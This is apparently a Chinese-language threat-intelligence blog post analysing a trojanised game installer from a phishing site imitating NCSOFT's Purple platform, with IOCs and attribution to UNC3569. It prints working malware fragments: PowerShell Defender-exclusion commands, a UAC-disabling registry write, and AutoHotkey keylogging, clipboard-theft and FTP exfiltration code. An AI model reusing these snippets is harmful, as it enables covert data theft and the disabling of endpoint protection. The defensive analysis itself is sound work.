【威脅情資】NCSOFT 天堂釣魚網站-遊戲安裝檔 RedCap (Ping32) 木馬逆向分析(上)
免責聲明:公開目的在於協助防禦、偵測與應變,不鼓勵亦不協助任何未經授權之入侵、存取或濫用行為
【威脅情資】NCSOFT 天堂釣魚網站-遊戲安裝檔 RedCap (Ping32) 木馬逆向分析(上)

夾帶木馬遊戲安裝檔逆向分析
免責聲明:公開目的在於協助防禦、偵測與應變,不鼓勵亦不協助任何未經授權之入侵、存取或濫用行為
本文發表前已依循負責任揭露原則(CVD)通報台灣電腦網路危機處理暨協調中心( TWCERT/CC)該起資安事件
為避免遭惡意利用,本文僅針對惡意載荷之逆向分析進行探討,不構成對任何組織之入侵原因、散布行為或管理責任之指控,僅就樣本行為進行技術分析。
本文所載之威脅指標(IOC)與樣本特徵,已隨通報一併提供予 TWCERT/CC
事件起源:從安裝異常活動鎖定入口
調查始於 2026 年 2 月初,端點偵測到異常活動。經網路封包與端點行為交叉比對,觀察到樣本下載來源為偽造遊戲平台 nc purple 合法相關之網域purple.purplenc[.]tw,該安裝檔 PurpleInstaller_2_26_202_60.exe於安裝後觸發告警。
![釣魚網站 purple.purplenc[.]tw](https://miro.medium.com/v2/resize:fit:1400/0*u5NfLlvQD5vN9B-k.png)
釣魚網站 purple.purplenc[.]tw
![釣魚網站 purple.purplenc[.]tw](https://miro.medium.com/v2/resize:fit:1400/1*ikgRtPS2kOHqBNRPKSRKKQ.png)
釣魚網站 purple.purplenc[.]tw
儘管偽造來源看似合法,但進一步分析隨即偵測到該安裝檔在 %Temp%目錄下寫入了多個執行檔,並觸發了「異常父程序」與「可疑腳本寫入」的告警,接著在程序執行日誌中發現了多個看似無關的執行檔,包括 u.exe 、svchost.exe 、update.exe 與msedge.exe ,經調查儘管執行檔檔名都不一樣,但其所有檔案的 MD 5 哈希值皆為 830d938d575de3df6c7d3c0ee751ad9b ,該 Hash 值說明該些工具是AutoHotkey.exe , AutoHotkey.exe 是 Windows 自動化腳本工具,它能將你的鍵盤與滑鼠重新定義,把繁瑣輸入的流程,縮減濃縮成一個按鍵就能完成的腳本。而這些檔案本質上是同一支程式的副本,其目的是為了在系統不同路徑下執行不同的惡意功能,或作為備援路徑以規避偵測。
進一步追蹤程序執行鏈,發現攻擊者利用了「系統原生工具(Living off the Land, LotL)」的戰術,安裝檔啟動後,呼叫了 Windows 合法程序 wscript.exe 來執行位於 Temp 目錄下的 link.vbs 腳本,由該 VBS 腳本進一步帶起後續的u.exe 與update.exe 等 AutoHotkey 偽裝程式,依本次樣本行為顯示其具備鍵盤側錄、截圖與 FTP 上傳等資料蒐集/外傳能力,疑似意圖針對高價值關鍵字資訊進行盜取並使用ftp對外洩漏。
調查思維:攻擊者疑似透過下載環節置入惡意載荷,使表面正常的安裝流程中執行惡意程式。本報告僅就樣本行為進行分析,不對散布源頭與責任歸屬作推定。
惡意程式分析
在進行測試分析之前先確認安裝檔 hash 為 B9CCE26F73E3A64FD53E36CD218213AA9E261A47D9D58C3DC94CA69BCCCC0DCD

PurpleInstaller_2_26_202_60.exe
比對發現目前沒有任何情資

B9CCE26F73E3A64FD53E36CD218213AA9E261A47D9D58C3DC94CA69BCCCC0DCD
接著開始進行本次調查分析,首先建立一個封閉環境,並使用 fakenet 設定網路環境,同時透過 procmon.exe 以及 RegistryChangesView.exe、Wireshark 分析惡意檔案行為接著直接執行該惡意安裝檔

PurpleInstaller_2_26_202_60.exe
確認 AutoHotkey 偽裝程式
安裝執行完後,因為先前的端點行為的調查發現有偽造 exe 的行為,所以首先檢查 C:\Users\---\AppData\Local\Temp 目錄下的 u.exe、svchost.exe、update.exe 與 msedge.exe
查看內容可以看到產品名稱直接就寫 AutoHotKey 了,並發現所有的 AutoHotKey 都有一個自己的惡意腳本 u.ahk、svchost.ahk、update.ahk、msedge.ahk

u.exe

svchost.exe

update.exe

msedge.exe
檢查四支執行檔的Hash值,0A9964FE0E0FB3F0679DF317A65F9945C474DAB8C4370B45B93DA64A8B201B9F

hash
將 Hash 比對 Virustotal

AutoHotKey
確認了 u.exe、svchost.exe、update.exe 與 msedge.exe 這四隻程式都是 AutoHotKey
調查 Process 行為
檢視 procmon,確認該安裝檔在執行時會帶起 AutoHotKey (u.exe),隨後執行惡意腳本 u.ahk 主動呼叫 PowerShell 來把自己所在的目錄加入防毒排除清單,而不是安裝程式本身做行為

u.exe

u.exe
看到 WScript.exe 執行了 link.vbs,並執行了update.exe,而update.exe接著又呼叫 powershell.exe,也發現WScript.exe 執行了一個可疑的檔案,檔案名稱包含 IP 137.175.109[.]243 ,並且使用參數 /silent 似乎嘗試規避察覺
![137.175.109[.]243](https://miro.medium.com/v2/resize:fit:1000/1*3M12Vr9gbh7JWGxtyjbdHA.png)
137.175.109[.]243
調查 137.175.109[.]243 IP 並沒有可疑記錄

137.175.109.243
調查 DNS 行為
為了確認在該惡意程式安裝期間是否有可疑 DNS 解析,我查詢了 Wireshark,並過濾 DNS

dns
在排除重複的名稱以及忽略 windows/google 後,開始排查不常見的DNS詢問,首先是digicert[.]com
![digicert[.]com](https://miro.medium.com/v2/resize:fit:1400/1*sKKQR6rK5EJ9MPaHD8yeug.png)
digicert[.]com
查看 digicert[.]com 發現 digicert 是數位憑證授權機構,可能是檢查程式是否由合法的開發商簽署
![digicert[.]com](https://miro.medium.com/v2/resize:fit:1400/1*67_-uYMSDLXoq2Qzm5CQgw.png)
digicert[.]com
接著注意到有某 API 網域 nc.com、baidu.com 跟一個 IP PTR反查

dns
nc.com 就是遊戲公司的 domain,不確定為什麼會詢問 baidu.com

nc.com
觀察到最後一個 243.109.175.137.in-addr.arpa 就很可疑了,這是 DNS 反向查詢,這代表主機有要對外 137.175.109[.]243 建立連線,向 DNS 伺服器發送請求,嘗試找出該 IP 對應的主機名稱,這 IP 與剛剛調查 WScript.exe 執行的檔名 IP 一樣,綜合檔名、反向查詢與行為線索,137.175.109[.]243 具備疑似通訊節點的特徵
調查腳本內容
接下來開始調查腳本的內容,從 link.vbs 開始
調查惡意腳本 link.vbs

link.vbs
在檢視腳本原始碼時,發現開發者留下了簡體中文的註解(如:**' 创建 WScript.Shell 对象、' 运行 update.exe (隐藏控制台))**
該腳本的運作遵循以下邏輯鏈結:
A (延時) B (隱蔽執行並等待回傳碼) C (遞進式觸發核心載荷)。
腳本中三次 WScript.Sleep 分別為 60秒、65秒、75秒,總計 200秒(3分20秒),多數自動化沙箱為了效率,單次分析時限通常設定在 120–180 秒之間(AnyRun),該腳本透過累計超過 3 分鐘的休眠,來規避沙的檢測
指令 WshShell.Run ..., 0, True 中的 True 要求系統必須等待上一個 .exe 執行結束(Terminated) 後,才能進行下一次休眠與啟動。這確保了 update.exe(通常負責致盲防毒軟體)完成任務後,後續的竊密模組才落地
參數 0 指標代表 intWindowStyle 為 Hidden 代表所有啟動的惡意程序將不會彈出 CMD 視窗或控制台介面
透過 link.vbs 我們可以確認攻擊的步驟
第一階段是等待60 秒後執行 update.exe ,再接著等待65 秒,接下來執行 msedge.exe,最後等待75 秒,執行 svchost.exe
既然知道了執行順序,那我就依照順序檢視腳本內容
調查惡意腳本 update.ahk
跟著 vbs的起動順序解析惡意腳本內容,首先檢查 update.ahk,發現該腳本被加密過,需要解密才有辦法看到實際的內容

update.ahk

update.ahk
仔細查看該腳本似乎是一個複合型惡意載入器,腳本有分兩個部分,上半部為加密亂碼,而下半部分則為 Base 64
第一部分調查-加密部分
首先查看加密部分,看到有一個加密公式 _.=chr(asc(a_loopfield)-(chr(55) chr(48))),只要能夠破解就能夠讀取相關資訊
a_loopfield (變數 ) 這是 AutoHotkey 在 Loop, Parse 迴圈中的內建變數,代表當前正在處理的那個「加密亂碼字元」。
asc(a_loopfield) (數值化) 則是將亂碼字元轉換為對應的 ASCII/Unicode 十進位數值,,而 chr(...) 則是將數值字元化 (轉成 ASCII),
所以從分析指令最內層開始分析, (chr(55) chr(48)),chr(55),查詢 ASCII 表,十進位 55 對應的字元是 '7'。

ASCII
而 chr (48) 對應到的是 '0'

ASCII
chr(55) chr(48) 組合起來是字串 "70"
所以解碼流程是先讀取亂碼字元,並將每個亂碼字元 (a_loopfield) 的 ASCII 數值 減去 70。
Decoded_Char = Chr(Asc(Encoded_Char) - 70)
在知道解密方式後使用 CyberChef 做線上解密,加密的內容有兩個地方 1=... 跟 2=...

1=...

2=...
第一段內容分析

1=...
權限提升與 UAC 繞過

權限提升與 UAC 繞過
可以看到該工具首先讀取 UACstatus ConsentPromptBehaviorAdmin 判斷目前系統是否啟用 UAC ,並準備進行提權操作
接著使用 RunAs 重新以管理員權限執行自己,若尚未為系統管理員則強制重新啟動
接著關閉 UAC 保護,將 ConsentPromptBehaviorAdmin 以及 PromptOnSecureDesktop 分別設定為 0,其目的是未來程式提權不再顯示 UAC 提示
RegWrite, REG_SZ, HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers, %A_AhkPath%, ~ RUNASADMIN
AutoHotkey 在寫入 Windows Registry,用「相容性層(Compatibility Layer)」把某個程式強制標記為永遠用系統管理員身分執行。它常被惡意程式拿來做「提權持久化」或「降低使用者警覺」
規避 Denfender

規避 Denfender
Run powershell -Command "Add-MpPreference -ExclusionPath '%A_Temp%'",,Hide`:
Run powershell -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\'",,Hide`
執行 PowerShell 告訴 Defender:「排除 %Temp% 以及 Common Files 資料夾」,這讓後續釋放的惡意檔案可以在 Temp 目錄下安全落地

規避 Denfender
它執行 windowsdefender://Threatsettings 直接呼叫出 Defender 的設定視窗,透過 WinSet, Transparent, 0 把這個設定視窗變為「完全透明」。
使用者肉眼看不到視窗彈出,WinMove 將視窗移動到特定座標 (確保 UI 元素位置固定),而 WinSet, AlwaysOnTop, On:強制視窗在最上層 (確保自動點擊能點到)
Hotkey, LButton, PingBiZuo 功能則是攔截滑鼠左鍵點擊,防止使用者點擊其他視窗

規避 Denfender
還發現腳本利用 Windows 的 Accessibility (無障礙輔助) API 來識別設定視窗內的按鈕(因為視窗看不見,只能靠代碼識別 UI 結構),並模擬點擊「關閉」開關,目標是開啟 Defender 設定頁面,遍歷 UI 元素找到「開關」,若狀態為開啟 (STATE_SYSTEM_CHECKED) 則執行點擊。
Run windowsdefender://Threatsettings直接呼叫 URL Protocol 開啟「病毒與威脅防護」設定頁面。

規避 Denfender
Acc_Get("Object", ...): 利用腳本附帶的 Acc.ahk 函式庫,抓取 UI 物件(開關按鈕)

規避 Denfender
accProtectionID:="4.2.4.5.5":這是硬編碼的 UI 元素 ID,因為 Windows 10 和 Windows 11 的設定選單 UI 結構(Accessibility ID)不同,腳本中也包含版本判斷邏輯,確認OS 版本號對應到 Windows 10/11 的「即時防護」或「竄改防護」,切換不同的 UI ID 開關位置

規避 Denfender
AccMouseClick(acc)計算該 UI 元素的座標並執行物理點擊

規避 Denfender
第二段內容分析

2=...
檢視第二段加密內容,發現是 AutoHotkey (AHK) 的函式庫,它的主要功用是提供函式的功能讓第一段惡意指令可以順利執行
第二部分調查-Base64 Encoding
函數 x(f) 內部的 static 1="TVqQA...",從第一個部分 1="..."

1="..."
到最後一個部分 1511="..."

1511="..."
loop 1511 T.=%a_index%的用意是它將 1511 個 靜態變數(static 1 到 static 1511)中的 Base64 字串拼湊起來
為了合並利用腳本將 update.ahk,的所有碎片拼起來並解碼成 extracted_malware.exe

extracted_malware.exe
在提取出來後,查看該 exe 的 sha256 值為5f169b32f8acf1937afbc53c1c3718d70fabe9ff9d560137a4b1196717c2687a

5f169b32f8acf1937afbc53c1c3718d70fabe9ff9d560137a4b1196717c2687a
比對 Virustoal 後確認藏在 update.ahk 的惡意 exe 為 trojan,檔案名稱為 setup_ip_137.175.109.243.exe (與 procmon 觀測到的行為一致)
而 update.ahk 的真實身分為 RedCap 家族木馬的加載器

RedCap
3/24更新
感謝 Ashley 大神指導交流,讓本次分析能夠順利完成威脅情資歸因
根據Google 的情報團隊發表的《DOWN THE GRAYRABBIT HOLE — EXPOSING UNC3569 AND ITS MODUS OPERANDI》可以發現本次發現的setup_ip_137.175.109.243.exe木馬,其命名模式與遭到駭客組織 UNC3569 濫用的商業監控軟體 NSecsoft Ping32一致,該報告提到NSecsoft Ping32 其中一種命名模式為 setup_ip_[IP_addr].exe,程式會自動將檔名中的 IP 設為通訊中繼站,這符合我在本次監控中所捕獲的第一階段載體 setup_ip_137.175.109.243.exe,證實了我們面對的正是 UNC3569 組織的標準攻擊手法 (TTPs)。

《DOWN THE GRAYRABBIT HOLE — EXPOSING UNC3569 AND ITS MODUS OPERANDI》
該木馬所執行的攻擊技術 ID

MITREATT&CK
數位簽章與實體公司關聯

數位簽章
檢視該木馬的數位簽章,發現 extracted_malware.exe 擁有一個狀態為「有效 (Valid)」的數位簽章,簽署者為 "Shandong Anzai Information Technology CO., Ltd." (山東安在信息技術有限公司)

根據 **NSecsoft Ping32 官網的資訊可以看到該程式確實是屬於
山東安在信息技術有限公司,由此可以證明該木馬就是被惡意利用的`NSecsoft Ping32`**

安在軟件
注意到 TimeStamperCertificate 欄位攻擊者在簽署時使用了 DigiCert 的合法時間戳記伺服器,這也造成了憑證效期是 2020/3/18 到 2021/3/22。
理論上它應該過期無效,但 Windows 驗證邏輯是:「只要在憑證有效期間內(2020-2021)蓋上了合法的時間戳,即使現在(2026)憑證已過期,該簽章永久有效。」
所以我們在前面調查才會有針對 DigiCert 的 DNS 網路流量

Shandong Anzai Information Technology CO., Ltd
查看 Shandong Anzai Information Technology CO., Ltd 發現有病毒是使用該簽章的討論

Shandong Anzai Information Technology CO., Ltd
下圖為 Virustotal 網友針對該木馬的留言

Virustotal
update.ahk 小結
update.ahk 是一支專門用來「癱瘓系統防禦」的惡意前導腳本。它首先透過修改登錄檔強制關閉 UAC 提示並取得管理員權限,接著利用 PowerShell 將惡意程式路徑加入防毒排除清單;其核心攻擊手法是利用 Accessibility (無障礙輔助) API 技術,在背景開啟「透明化」的 Windows Defender 設定視窗,並鎖死滑鼠輸入,直接模擬物理點擊來強制關閉「即時防護」與「防竄改保護」
同時也是惡意加載器(Dropper),使用「變數分塊混淆」,將一個體積龐大的 RedCap (Fruit) 木馬(SHA256: 5f169b32...)拆分為 1511 個靜態 Base64 片段隱藏於腳本變數中,藉此破碎化惡意檔案特徵以規避端點防護系統(EDR)的靜態掃描。該腳本在執行時會自動還原載荷並釋放至 %Temp% 目錄下的 setup_ip_137.175.109.243.exe,檔名中直接暴露了攻擊者的第一層 C2 通訊節點 IP 地址。
調查 msedge.ahk
查看腳本內容,發現有 base 64 的部分,並拆成6個部分

msedge.ahk
最前面的 10 跟 1 ,不確定作用是否為啟動或等待時間,組合剩餘的片段並解碼,發現 IP 跟疑似連線參數含 IP 與遠端路徑等/2026_243/

msedge.ahk
接著繼續查看腳本內容,發現加密的模式,以及亂碼總共有 25 段

msedge.ahk
a_loopfield: 代表當前迴圈正在讀取的那個「亂碼字符」。asc(a_loopfield): 獲取該亂碼字符的 ASCII 數值。

ASCII
57+13=70,所以跟 update.phk 一樣,解密就是移位 (-70)
由於該腳本的亂碼有 25 段,我先將 25 段亂碼合併再透過 python 解碼

msedge.ahk

msedge.ahk

msedge.ahk
該腳本內容前段與 update.ahk 一樣
- 提權
- 關閉 Windows Defender 防護
- 加入排除路徑
- 操控 Defender UI(透過 Accessibility API)
但後面開始有不一樣的功能
Chrome 帳戶資訊收集
搜尋 Chrome Profile,最多掃 200 個

msedge.ahk
開啟 Google 帳戶頁面

msedge.ahk
這幾個頁面都是交易紀錄、付款方式、帳戶設定

msedge.ahk

msedge.ahk
截圖功能
透過截圖功能盜取敏感資訊,並將圖檔儲存至 C:\ProgramData\NVIDIA\Corporation\(攻擊者偽裝之系統路徑)

msedge.ahk
不知道是否沒有觸發功能失敗,本機沒有看到\NVIDIA\目錄

msedge.ahk
Google 清除痕跡
帳戶登出

msedge.ahk
- 點擊右上角 Google 帳戶
- 等待「登出」選項出現
- 點擊登出
- 關閉 Chrome
關閉Chrome

msedge.ahk
FTP 功能

msedge.ahk
- 連線到指定 FTP
- 上傳所有截圖
- 關閉連線
Hook 行為(自動觸發)
監控 wParam,當等於 0 x 200 (WM_MOUSEMOVE),只要滑鼠移動就會定期再執行 Chrome 截圖流程

msedge.ahk
msedge.ahk 小結
本工具為一套以 AutoHotkey 撰寫的惡意自動化程式,其主要功能為繞過系統防護機制並蒐集受害者 Google 帳戶之金流相關資訊。程式執行後會先嘗試以系統管理員權限重新啟動自身,接著修改登錄檔設定以降低或關閉使用者帳戶控制(UAC)與 Windows Defender 防護機制,並透過 PowerShell 指令將特定目錄加入防毒排除清單,以避免後續行為遭偵測。
在防護機制被停用後,程式會搜尋本機 Google Chrome 瀏覽器的所有使用者設定檔,逐一開啟與 Google Payments、Play 商店付款方式、點數及帳戶設定相關頁面,透過 UI 自動化技術與螢幕截圖方式擷取交易紀錄與付款資訊畫面,並將截圖檔案儲存於偽裝之系統目錄中。完成資料蒐集後,該工具會透過內建 FTP 功能將截圖檔案上傳至攻擊者指定之遠端伺服器,最後關閉瀏覽器並結束程式執行。
整體而言,此工具屬於具備提權、防禦繞過、資訊蒐集與資料外洩能力之資訊竊取型惡意程式,主要目標為取得受害者 Google 帳戶之金流與付款相關資訊
調查 svchost.ahk
svchost.ahk 腳本一樣有 base64 與加密兩個部分

svchost.ahk
先解碼 base64 的部分,發現是剛剛腳本有發現的 IP 以及參數,還有一些針對性的字串

svchost.ahk
接下來檢視加密的部分

svchost.ahk

svchost.ahk
Asc() 函式的作用是「取得字元的 ASCII 編碼數值」,查閱 ASCII 表,數字字元 '9' 的十進位數值是 57,所以,asc(9) = 57
結果:57+13=70
a_loopfield 是 AHK 的內建變數,代表「現在迴圈讀取到的那一個亂碼字元」,而 asc(...) 功能為轉數值,將亂碼轉成電腦看的數字,
最外況的 chr(...),則是將內容轉回文字
所以解碼流程是先讀取亂碼字元並轉數字,在減去 70 後在轉回文字
這次嘗試手動驗證,因為預設的 Big 5 編碼會讓內容字元誤判為中文字,而 UTF-8 可能會讓某些字元消失,所以先將改為Windows-1252 (西歐語系)

svchost.ahk
處理完編碼格式後嘗試手動解碼

svchost.ahk

ASCII

ASCII

ASCII

ASCII

ASCII

ASCII

ASCII

ASCII

ASCII
[HOP]129129 - 70 = 59 (;)註解符號 (Semicolon)f102102 - 70 = 32 ( )空白 (Space)[PLU]140140 - 70 = 70 (F)F[SCI]154154 - 70 = 84 (T)T[SPA]150150 - 70 = 80 (P)Pª170170 - 70 = 100 (d)d¯175175 - 70 = 105 (i)iÀ192192 - 70 = 122 (z)z®174174 - 70 = 104 (h)h¯175175 - 70 = 105 (i)i
; FTPdizhi
認該解秘方式正確,接著發現該檔案下方也有一個公式表頭,實際上也是一樣 -70

svchost.ahk
透過 CyberChef 直接解密

svchost.ahk
鍵盤側錄 (Keylogging)

svchost.ahk

svchost.ahk
這是腳本監聽按鍵並將內容寫入日誌的關鍵指令
1. 註冊所有按鍵的監聽鉤子 (Hook)
Loop, Parse, allkeys, }< Hotkey, }>*%A_LoopField%, %r%, %f% UseErrorLevel ;
2. 將捕捉到的按鍵內容寫入 K_log.txt (K_log即 Key Log)
FileAppend, % this.text, % ߺ]ߨX²o߹D "\K_log.txt"
螢幕截圖 (Screen Capture)

svchost.ahk
這是腳本偵測到目標視窗後,執行截圖並儲存的邏輯。
1. 檢查當前視窗標題是否包含「目標關鍵字」
if InStr(GetTitle, LoopField) }; ;
2. 呼叫 GDI+ 函式進行螢幕截圖
hBM := HBitmapFromScreen(pX, pY, pW, pH) ;
3. 將截圖存檔為 .jpg,檔名包含時間戳記
SavePicture(hBM, l'aߗ>DG²o߹D)
剪貼簿竊取 (Clipboard Theft)

svchost.ahk

svchost.ahk
腳本監控剪貼簿變化,並竊取文字內容的指令
; 1. 註冊剪貼簿變更事件,當內容改變時觸發 ClipChanged 函式
OnClipboardChange("ClipChanged")
; 2. 定義竊取邏輯:抓取前 200 個字元並寫入 C.txt (Clipboard)
ClipChanged() };
WinGetTitle, GetTitle, A
FileAppend, % A_YYYY "-" A_MM "-" A_DD " " A_Hour ":" A_Min ":" A_Sec " - " GetTitle "`r`n" SubStr(Clipboard, 1, 200) "`r`n`r`n", % ߺ]ߨX²o߹D "\C.txt", UTF-8
}=
資料外洩 (Data Exfiltration — FTP)

svchost.ahk
這是腳本將竊取到的檔案上傳至駭客伺服器的關鍵指令
; 1. 連線至 FTP 伺服器 (使用解密後的 IP、帳號、密碼)
hSession := FTP.Connect(hFTP, FTPdi}:hi, 21, FTPuser, FTPpasswd)
; 2. 上傳檔案 (PutFile) 至駭客指定的目錄
FTP.PutFile(hSession, A_LoopFileFullPath, FTPmulu . ...)
; 3. 上傳成功後,刪除本地檔案以滅證
FileDelete, %A_LoopFileFullPath%
svchost.ahk 小結
總結來說svchost.ahk 腳本包含了以下幾個功能
- 鍵盤側錄 (Keylogging): 它會記錄受害者的所有按鍵輸入以及當下的視窗標題,並將內容儲存到日誌檔案
K_log.txt中 - 螢幕截圖 (Screen Capture): 當受害者開啟含有特定關鍵字(定義在變數
߀sÏnªMpvD中)的視窗時,它會自動截圖 - 剪貼簿竊取 (Clipboard Theft): 它會監控剪貼簿的變化,並將複製的文字內容(前 200 個字元)儲存到檔案
C.txt中 - 資料外洩 (Exfiltration): 它會將收集到的所有資料(按鍵紀錄、截圖、剪貼簿內容)透過 FTP 上傳到駭客的伺服器
調查 u.ahk
u.exe 在 link.vbs 並沒有被提到,但在之前的端點行為分析中以及 procmon 行為有看到該支程式以及後續的惡意行為,所以我一樣調查他的執行腳本u.ahk
它利用遍歷亂碼字串 (_ord),將每個字元的 ASCII/Unicode 值與 0x3826 (Hex) 進行 XOR (異或運算)。
而金鑰 (Key) 就是 0x3826 可以透過該金鑰將內容解密

u.ahk
透過CyberChef 解碼,首先必須要Encoding: UTF-16LE (因為 Windows AHK 預設是 Little Endian),接著使用XOR搭配Key: 2638,最後在 Decode Text,UTF-16LE (把解開的 Bytes 轉回文字)
解碼後發現 u.ahk 內容基本上跟 update.ahk 一樣,只是 update.ahk 多了惡意木馬程式

u.ahk
分析到這邊基本上就結束了,可以看到本次的利用是攻擊者利用使用者對廠商的信任,透過偽造遊戲平台網頁,將惡意載荷(Payload)封裝在安裝流程中 ,當執行安裝時首先惡意程式會提升權限,並執行多種手法的防禦規避,接著列舉並盜取敏感資訊,最後將敏感資訊洩漏,而這一切都是在使用者毫無察覺的情況下發生
本文所稱『品牌相關網域』僅代表當時觀察到的下載解析/連線關聯,不代表該品牌官方主動散布;可能原因包含供應鏈第三方、鏡像站或下載節點遭竄改、導流或仿冒等,責任歸屬需由主管機關與相關單位進一步釐清。
更新 3/2
https://purple.purplenc[.]tw/釣魚網站已經無法存取
![https://purple.purplenc[.]tw/](https://miro.medium.com/v2/resize:fit:1400/1*oCy--Z_j7uv_KYV56HW_jg.png)
遊戲 FB 相關討論區已經有人開始提醒

FB討論區
reddit 討論區也有人在提醒大家不要從https://purple.purplenc[.]tw/下載遊戲

威脅指標 (IOCs)
File Name:
extracted_malware.exe(原名setup_ip_137.175.109.243.exe)PurpleInstaller_2_26_202_60.exe
SHA256 :
- setup_ip_137.175.109.243.exe/
5f169b32f8acf1937afbc53c1c3718d70fabe9ff9d560137a4b1196717c2687a - PurpleInstaller_2_26_202_60.exe/
B9CCE26F73E3A64FD53E36CD218213AA9E261A47D9D58C3DC94CA69BCCCC0DCD - AutoHotkey.exe/
0A9964FE0E0FB3F0679DF317A65F9945C474DAB8C4370B45B93DA64A8B201B9F
URL :
https://purple.purplenc[.]tw/
C2 IP :
185.127.93[.]186(FTP / Exfiltration)137.175.109[.]243(Socket / Control)
資料夾路徑:
C:\Users\user\AppData\Local\TempC:\ProgramData\NVIDIA\Corporation\/2026_243/
Digital Signature :
- Signer:
Shandong Anzai Information Technology CO.,Ltd. - Serial Number:
0B735294CCD4A2BC584928457FE72C62 - Status: Valid (Timestamped)
參考文章
《DOWN THE GRAYRABBIT HOLE — EXPOSING UNC3569 AND ITS MODUS OPERANDI》
後續更新
【威脅情資】NCSOFT 天堂釣魚網站-遊戲安裝檔 RedCap (Ping32) 木馬逆向分析(下)

nc 天堂 釣魚網站 木馬 | Medium
메타데이터
- post_id
- 61bb5e46b1a4
- slug
- 威脅情資-遊戲安裝檔夾帶-redcap-木馬之逆向分析-61bb5e46b1a4
- url
- https://medium.com/@sega_tw/%E5%A8%81%E8%84%85%E6%83%85%E8%B3%87-%E9%81%8A%E6%88%B2%E5%AE%89%E8%A3%9D%E6%AA%94%E5%A4%BE%E5%B8%B6-redcap-%E6%9C%A8%E9%A6%AC%E4%B9%8B%E9%80%86%E5%90%91%E5%88%86%E6%9E%90-61bb5e46b1a4
- canonical_url
- https://medium.com/@sega_tw/%E5%A8%81%E8%84%85%E6%83%85%E8%B3%87-%E9%81%8A%E6%88%B2%E5%AE%89%E8%A3%9D%E6%AA%94%E5%A4%BE%E5%B8%B6-redcap-%E6%9C%A8%E9%A6%AC%E4%B9%8B%E9%80%86%E5%90%91%E5%88%86%E6%9E%90-61bb5e46b1a4
- author_url
- https://medium.com/@sega_tw
- status
- ok
- fetched_at
- 2026-07-13 06:23:13